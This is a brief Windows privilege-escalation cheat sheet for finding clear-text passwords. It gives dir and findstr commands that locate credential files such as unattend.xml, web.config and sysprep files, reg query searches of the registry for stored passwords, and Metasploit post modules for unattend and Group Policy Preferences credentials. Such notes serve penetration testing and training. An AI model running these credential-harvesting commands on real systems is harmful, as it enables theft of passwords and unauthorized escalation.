PrivEsc - Clear Text passwords
-------------------------------------------------------------------------------
# find the full path of files that commonly hold clear-text credentials
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
-------------------------------------------------------------------------------
# find the keyword "password" in all files (/s recurse, /p skip files with non-printable characters, /i ignore case, /n show line numbers)
findstr /spin "password" *.*
# find files with the following extensions that contain the keyword "password"
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
# Metasploit module to discover credentials via unattended installations
post/windows/gather/enum_unattend
-------------------------------------------------------------------------------
# search the registry for REG_SZ entries matching "password" (/s searches all subkeys)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
-------------------------------------------------------------------------------
# Metasploit post modules (run against a meterpreter session)
post/windows/gather/credentials/gpp
post/windows/gather/enum_unattend